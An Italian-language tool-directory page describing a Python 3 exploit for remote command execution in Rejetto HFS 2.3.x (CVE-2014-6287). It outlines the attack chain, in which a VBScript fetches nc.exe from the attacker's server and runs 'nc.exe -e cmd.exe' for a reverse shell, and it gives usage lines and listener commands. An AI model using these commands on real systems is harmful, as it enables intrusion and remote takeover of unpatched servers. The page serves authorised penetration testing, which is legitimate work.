Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit di esecuzione di comandi da remoto per Rejetto HTTP File Server 2.3.x (CVE-2014-6287) riscritto in Python 3 per test di sicurezza offensiva moderni. | Kitploit
Strumenti/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso Remoto

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit di esecuzione di comandi da remoto per Rejetto HTTP File Server 2.3.x (CVE-2014-6287) riscritto in Python 3 per test di sicurezza offensiva moderni.

Vedi Repository
8 mesi faNon ancora revisionato

Exploit di Esecuzione Remota di Comandi su HFS (CVE-2014-6287)

Questa è una riscrittura in Python 3 del classico exploit di Esecuzione Remota di Comandi (RCE) che colpisce Rejetto HTTP File Server (HFS) v2.3.x, sfruttando la vulnerabilità identificata come CVE-2014-6287.

Originariamente scoperto da Avinash Kumar Thapa alias "-Acid", questa versione migliora portabilità e usabilità, fornendo parametrizzazione completa e compatibilità moderna.


⚠️ Avvertenza

Questo strumento è fornito esclusivamente per scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione è illegale e non etico.


📌 Dettagli dell'Exploit

  • Vulnerabilità: Rejetto HFS v2.3.x - Esecuzione Remota di Comandi
  • CVE: CVE-2014-6287
  • Impatto: Esecuzione remota di codice con privilegi di sistema
  • Requisito: Il target deve eseguire una versione vulnerabile di HFS con scripting abilitato.

🚀 Caratteristiche

  • Pienamente compatibile con Python 3
  • Accetta tutti i parametri chiave tramite CLI:
    • IP e porta del target
    • IP locale (attaccante)
    • Porta in ascolto per la reverse shell
    • Porta usata per ospitare nc.exe
  • Nessun valore hardcoded
  • Consegna classica della reverse shell tramite nc.exe utilizzando VBScript
  • Flusso dell'exploit:
    1. Caricare un VBScript per scaricare nc.exe
    2. Eseguire il VBScript sul target
    3. Eseguire nc.exe -e cmd.exe per stabilire una reverse shell

🛠️ Utilizzo

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Requirements:
  - HTTP server serving nc.exe:
      python3 -m http.server 8000
  - Listener:
      nc -lvnp 4444
Scarica lo strumento